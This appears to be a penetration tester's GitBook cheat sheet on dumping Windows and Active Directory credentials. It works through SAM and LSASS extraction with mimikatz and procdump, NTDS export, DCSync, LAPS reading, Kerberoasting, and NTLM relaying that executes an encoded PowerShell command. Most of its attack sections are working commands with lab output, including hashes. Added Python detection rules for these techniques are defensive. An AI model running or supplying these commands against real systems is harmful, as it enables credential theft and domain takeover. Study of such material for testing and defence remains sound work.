# 4. Dumping Credentials

## Dumping SAM

The SAM file typically cannot be accessed while Windows is running

```bash
c:\Windows\System32\config\sam
```

So we get hold of it via

* meterpreter
* mimikatz
* Volume Shadow Copy Service / Registry Hives

Meterpreter Method

```bash
meterpreter > getuid
Server username: THM\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d80d18385cea5ab3aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:443e64439a4b7fe780db47fc06a3342d:::
```

Volume Shadow Copy Service / Registry Hives

{% code overflow="wrap" %}

```bash
C:\Users\Administrator>wmic shadowcopy call create Volume='C:\'

Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
};
```

{% endcode %}

Saving the SAM hive from the registry

{% code overflow="wrap" %}

```bash
C:\Users\Administrator\Desktop>reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg
```

{% endcode %}

Whether we took the SAM from the shadow copy or from the registry hive, we need the key found in `c:\Windows\System32\Config\system` to decrypt it.

{% code overflow="wrap" %}

```bash
C:\Users\Administrator\Desktop>reg save HKLM\system C:\users\Administrator\Desktop\system-reg
```

{% endcode %}

Once we have both files, we move them to the attacker machine and decrypt them there with impacket's `secretsdump.py`

{% code overflow="wrap" %}

```bash
user@machine:~ python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```

{% endcode %}

## Dumping LSASS

LSASS (the Local Security Authority Subsystem Service) holds the credentials of logged-on users in memory, including password hashes

Before dumping LSASS, we need to disable LSA Protection, which mimikatz does by loading its `mimidrv` driver

```
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
```

Creating a dump file via GUI

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2FQ2MgQ92MS5aGUPY9M95y%2Fw8j88pzy.bmp?alt=media&#x26;token=ff08f2c1-bff8-4af4-a8df-83371d337998" alt=""><figcaption></figcaption></figure>

Dumping via `procdump` from the Sysinternals Suite

```
c:\>c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[09:09:33] Dump 1 initiated: c:\Tools\Mimikatz\lsass_dump-1.dmp
[09:09:33] Dump 1 writing: Estimated dump file size is 162 MB.
[09:09:34] Dump 1 complete: 163 MB written in 0.4 seconds
[09:09:34] Dump count reached.
```

Dumping via mimikatz

```
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515377 (00000000:0007dd31)
Session           : RemoteInteractive from 3
User Name         : Administrator
Domain            : THM
Logon Server      : CREDS-HARVESTIN
Logon Time        : 6/3/2022 8:30:44 AM
SID               : S-1-5-21-1966530601-3185510712-10604624-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : THM
         * NTLM     : 98d3a787a80d08385cea7fb4aa2a4261
         * SHA1     : 64a137cb8178b7700e6cffa387f4240043192e72
         * DPAPI    : bc355c6ce366fdd4fd91b54260f9cf70
...
```
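Added detection example (not from the original page): three rules over constructed Windows event records matching the steps in this section: the `mimidrv` service registered by `!+` (event 7045), a `procdump -ma lsass.exe` command line (event 4688 / Sysmon 1), and a process opening lsass.exe with PROCESS_VM_READ (Sysmon 10). The events and the allow-list are constructed.

```python
import re

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
# Constructed allow-list of processes that may legitimately read lsass memory; tune per estate.
LSASS_READERS_ALLOWED = {r"c:\windows\system32\wbem\wmiprvse.exe"}

# Constructed event records (not real telemetry), one per technique shown in this section.
SAMPLE_EVENTS = [
    {"log": "System", "event_id": 7045, "fields": {"ServiceName": "mimidrv",
        "ImagePath": r"C:\Tools\Mimikatz\mimidrv.sys", "ServiceType": "kernel mode driver"}},
    {"log": "Security", "event_id": 4688, "fields": {"NewProcessName": r"C:\Tools\SysinternalsSuite\procdump.exe",
        "CommandLine": r"procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump"}},
    {"log": "Sysmon", "event_id": 10, "fields": {"SourceImage": r"C:\Tools\Mimikatz\mimikatz.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"}},
    {"log": "Sysmon", "event_id": 10, "fields": {"SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"}},  # benign query
    {"log": "Security", "event_id": 4688, "fields": {"NewProcessName": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe report.txt"}},
]

def detect_lsass_dumping(events):
    """Return (rule, detail) tuples for events matching the LSASS-dumping steps on this page."""
    alerts = []
    for ev in events:
        eid, f = ev["event_id"], ev["fields"]
        if ev["log"] == "System" and eid == 7045:
            # Rule 1: the '!+' step registers mimikatz's kernel driver as a service called mimidrv
            if re.search(r"mimidrv", f.get("ServiceName", "") + f.get("ImagePath", ""), re.I):
                alerts.append(("mimidrv-service", f.get("ImagePath", "")))
        elif eid in (1, 4688):
            # Rule 2: procdump asked to write a full dump (-ma) of lsass.exe
            cmd = f.get("CommandLine", "")
            if re.search(r"procdump", cmd, re.I) and re.search(r"lsass", cmd, re.I):
                alerts.append(("procdump-lsass", cmd))
        elif ev["log"] == "Sysmon" and eid == 10:
            # Rule 3: a non-allow-listed process opened lsass.exe with PROCESS_VM_READ set
            source = f.get("SourceImage", "").lower()
            granted = int(f.get("GrantedAccess", "0x0"), 16)
            if (f.get("TargetImage", "").lower().endswith(r"\lsass.exe")
                    and granted & PROCESS_VM_READ and source not in LSASS_READERS_ALLOWED):
                alerts.append(("lsass-memory-read", f"{source} GrantedAccess=0x{granted:x}"))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect_lsass_dumping(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```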

## Dumping from Windows Credential Manager

Use `vaultcmd` to find any stored credentials

```bash
C:\Users\Administrator>vaultcmd /list
Currently loaded vaults:
        Vault: Web Credentials
        Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

        Vault: Windows Credentials
        Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
        Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault
```

Use `/listproperties` to check whether a given vault holds any stored credentials

```bash
C:\Users\Administrator>VaultCmd /listproperties:"Web Credentials"
Vault Properties: Web Credentials
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Number of credentials: 1
Current protection method: DPAPI
```

Extract the password using `Get-WebCredentials.ps1`

```bash
C:\Users\Administrator>powershell -ex bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> Import-Module C:\Tools\Get-WebCredentials.ps1
PS C:\Users\Administrator> Get-WebCredentials

UserName  Resource             Password     Properties
--------  --------             --------     ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
```

Using `cmdkey`, we can see which credentials are already stored in the session

```bash
C:\Users\thm>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=thm\thm-local
    Type: Domain Password
    User: thm\thm-local
```

Knowing this, we can use `runas /savecred` to run a command under that saved credential, authenticating to the domain `THM.red` without ever seeing the password

```bash
C:\Users\thm>runas /savecred /user:THM.red\thm-local cmd.exe
Attempting to start cmd.exe as user "THM.red\thm-local" ...
```

Dumping Credential Manager credentials using mimikatz

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman
```

## Dumping from Domain Controller

### NTDS

New Technologies Directory Services (NTDS) is the database containing all Active Directory data, including objects, attributes and credentials

NTDS is located in `C:\Windows\NTDS`

Decrypting the NTDS file requires a system Boot Key which is stored in the `C:\Windows\System32\config\SECURITY`

In essence, we need these 3 files

* `C:\Windows\NTDS\ntds.dit`
* `C:\Windows\System32\config\SYSTEM`
* `C:\Windows\System32\config\SECURITY`

Using `ntdsutil.exe`, this dumps out all 3 files we need into `C:\temp`

```bash
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
```

Copy those files to the attacker machine and decrypt them with impacket to get the hashes

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local
```

{% endcode %}

### DCSync

{% code overflow="wrap" %}

```
mimikatz # log dcdump.txt
mimikatz # lsadump::dcsync /domain:za.tryhackme.loc /all
```

{% endcode %}

Now we analyze the file with grep

{% code overflow="wrap" %}

```bash
cat dcdump.txt | grep "SAM Username"
cat dcdump.txt | grep "Hash NTLM"

cat dcdump.txt | grep "krbtgt" -A10 # get ntlm hash of krbtgt for golden ticket forging
cat dcdump.txt | grep "<machine name>" -A10 # get ntlm hash of machine account for silver ticket forging
```

{% endcode %}

### impacket

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc THM.red/<AD_Admin_User>@10.10.224.1 

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
thm.red\\thm:1114:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::

## only dumping ntlm hashes
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@10.10.224.1
```

{% endcode %}
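Added detection example (not from the original page) covering both the NTDS and DCSync paths above: it flags an `ntdsutil ... ifm` command line in process-creation events, and event 4662 entries in which an account other than a domain controller exercises the DS-Replication-Get-Changes rights. The replication GUIDs are the real Active Directory control-access-right GUIDs; the host and account names are constructed.

```python
import re

# Control-access-right GUIDs that event 4662 records when directory replication is requested.
# These are the real Active Directory GUIDs; only the host/account names below are constructed.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
KNOWN_DC_ACCOUNTS = {"dc01$"}  # constructed: computer accounts of the legitimate domain controllers

# Constructed event records (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 4688, "fields": {"SubjectUserName": "Administrator",
        "CommandLine": "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\""}},
    {"event_id": 4662, "fields": {"SubjectUserName": "DC01$",          # normal DC-to-DC replication
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}},
    {"event_id": 4662, "fields": {"SubjectUserName": "thm",            # a user account replicating: DCSync
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}},
    {"event_id": 4662, "fields": {"SubjectUserName": "thm",            # unrelated object access
        "Properties": "{deadbeef-0000-4000-8000-000000000000}"}},
]

def detect_dc_dumping(events):
    """Flag both paths above: an offline NTDS copy via ntdsutil IFM, and DCSync replication requests."""
    alerts = []
    for ev in events:
        f = ev["fields"]
        if ev["event_id"] == 4688:
            # 'ifm create full <dir>' writes ntds.dit plus the SYSTEM and SECURITY hives to disk
            cmd = f.get("CommandLine", "")
            if re.search(r"ntdsutil", cmd, re.I) and re.search(r"\bifm\b", cmd, re.I):
                alerts.append(("ntds-ifm-export", cmd))
        elif ev["event_id"] == 4662:
            # Replication rights exercised by anything that is not a known domain controller
            props = f.get("Properties", "").lower()
            rights = [name for guid, name in DS_REPLICATION_GUIDS.items() if guid in props]
            subject = f.get("SubjectUserName", "").lower()
            if rights and subject not in KNOWN_DC_ACCOUNTS:
                alerts.append(("dcsync", f"{subject} used {', '.join(rights)}"))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect_dc_dumping(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```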

## Local Administrator Password Solution (LAPS)

We can check whether LAPS is installed by looking for `AdmPwd.dll` in the LAPS CSE directory

```bash
C:\Users\thm>dir "C:\Program Files\LAPS\CSE"
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Program Files\LAPS\CSE

06/06/2022  01:01 PM              .
06/06/2022  01:01 PM              ..
05/05/2021  07:04 AM           184,232 AdmPwd.dll
               1 File(s)        184,232 bytes
               2 Dir(s)  10,306,015,232 bytes free
```

Find the groups that hold extended rights to read LAPS passwords

```
PS C:\Users\thm> Find-AdmPwdExtendedRights -Identity THMorg

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=THMorg,DC=thm,DC=red                       {THM\THMGroupReader}
```

Finding users in the group

```
PS C:\Users\thm> net groups "THMGroupReader"
Group name     THMGroupReader
Comment

Members

-------------------------------------------------------------------------------
bk-admin
The command completed successfully.
```

Once we compromise `bk-admin`, we can use that account to read LAPS passwords

```bash
C:\Users\thm> runas /user:THM\bk-admin cmd.exe
```

{% code overflow="wrap" %}

```
PS C:\> Get-AdmPwdPassword -ComputerName creds-harvestin

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
CREDS-HARVESTIN      CN=CREDS-HARVESTIN,OU=THMorg,DC=thm,DC=red    FakePassword    2/11/2338 11:05:2...
```

{% endcode %}

## Kerberoasting

A Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and then a Ticket Granting Service (TGS) ticket for a service account.

Because the TGS is encrypted with that account's password hash, we can attempt to brute force the password offline

We need accounts with a Service Principal Name (SPN), such as IIS or MSSQL service accounts

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578
```

{% endcode %}

Once we find the SPN user, we can send a single request to get a TGS ticket for the `svc-user` account using the `-request-user` argument.

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm -request-user svc-user 

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc-user$THM.RED$THM.red/svc-user*$8f5de4211da1cd5715217[*REMOVED*]7bfa3680658dd9812ac061c5
```

{% endcode %}

After getting the TGS, we can attempt to crack it to get the password

```bash
user@machine$ hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt
```
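Added example (not from the original page) for the Kerberoasting workflow above: `parse_krb5tgs` breaks the `$krb5tgs$23$*user$REALM$spn*$...` string into its fields (etype 23 is RC4, which is why hashcat mode 13100 applies), and `detect_kerberoast` runs the matching defender check over constructed event 4769 records, reporting accounts that obtained RC4-encrypted service tickets for user SPN accounts. The ticket bytes and event records are constructed.

```python
import re
from collections import defaultdict

# hashcat-style string printed by GetUserSPNs.py -request-user: $krb5tgs$<etype>$*user$REALM$spn*$checksum$edata
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<data>[0-9a-fA-F$]+)$")
ETYPE_NAMES = {23: "RC4-HMAC (hashcat mode 13100)", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}

# Constructed values: the ticket bytes are filler, not a real TGS.
SAMPLE_HASH = "$krb5tgs$23$*svc-user$THM.RED$THM.red/svc-user*$8f5de4211da1cd5715217aabbccddeeff$00112233445566778899aabbccddeeff"
SAMPLE_EVENTS = [  # constructed event 4769 records (not real telemetry)
    {"event_id": 4769, "fields": {"TargetUserName": "thm@THM.RED", "ServiceName": "svc-user",
        "TicketEncryptionType": "0x17", "Status": "0x0"}},
    {"event_id": 4769, "fields": {"TargetUserName": "thm@THM.RED", "ServiceName": "CREDS-HARVESTIN$",
        "TicketEncryptionType": "0x17", "Status": "0x0"}},   # machine account: random 120-char password
    {"event_id": 4769, "fields": {"TargetUserName": "jdoe@THM.RED", "ServiceName": "svc-sql",
        "TicketEncryptionType": "0x12", "Status": "0x0"}},   # AES: the normal, expected case
    {"event_id": 4769, "fields": {"TargetUserName": "jdoe@THM.RED", "ServiceName": "svc-user",
        "TicketEncryptionType": "0x17", "Status": "0x1b"}},  # request failed: no ticket to crack
]

def parse_krb5tgs(s):
    """Split a $krb5tgs$ string into its fields so the etype, account and SPN can be read off."""
    m = KRB5TGS_RE.match(s.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ string")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["etype_name"] = ETYPE_NAMES.get(d["etype"], "unknown")
    return d

def detect_kerberoast(events):
    """Map each requester to the user service accounts it obtained RC4 (0x17) TGS tickets for.
    Machine accounts ($), krbtgt and failed requests are excluded: only an issued RC4 ticket for a
    user SPN is something hashcat mode 13100 can crack."""
    per_requester = defaultdict(set)
    for ev in events:
        f = ev.get("fields", {})
        service = f.get("ServiceName", "").lower()
        if ev.get("event_id") != 4769 or f.get("Status") != "0x0" or service == "krbtgt" or service.endswith("$"):
            continue
        if f.get("TicketEncryptionType", "").lower() == "0x17":
            per_requester[f.get("TargetUserName", "").lower()].add(service)
    return {requester: sorted(services) for requester, services in per_requester.items()}

if __name__ == "__main__":
    print(parse_krb5tgs(SAMPLE_HASH)["etype_name"])
    print(detect_kerberoast(SAMPLE_EVENTS))
```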

## NTLM Relaying

### Responder

On the attacker

```
$ sudo responder -I tun0
```

On the victim, run this. Responder should capture the account's NTLM hash, which you can crack or pass

```
PS> dir //attackerip/lol
```

### NTLMRelayx

On the attacker

```
$ impacket-ntlmrelayx --no-http-server -smb2support -t <relay_target> -c "powershell -enc JABjAGwAaQBlAG4AdA..."
```

On the victim, run this. ntlmrelayx captures the NTLMv2 authentication, which we can either crack or relay to the target server to authenticate and execute the given command

```
PS> dir //attackerip/lol
```

## Other methods

### PowerShell history file

{% code overflow="wrap" %}

```bash
C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

{% endcode %}

### Passwords in Registry

```bash
c:\Users\user> reg query HKLM /f password /t REG_SZ /s

C:\Users\user> reg query HKCU /f password /t REG_SZ /s
```

### Unattended Windows Installations

* C:\Unattend.xml
* C:\Windows\Panther\Unattend.xml
* C:\Windows\Panther\Unattend\Unattend.xml
* C:\Windows\system32\sysprep.inf
* C:\Windows\system32\sysprep\sysprep.xml

### Saved Credentials

You can’t see the passwords, but you can ride on them

```bash
cmdkey /list # seeing if there are saved creds in the session
```

```bash
runas /savecred /user:admin cmd.exe # if admin has a saved cred, we can run as him
```

### IIS Configuration

{% code overflow="wrap" %}

```bash
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
```

{% endcode %}

### Software: PuTTY

{% code overflow="wrap" %}

```bash
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```

{% endcode %}
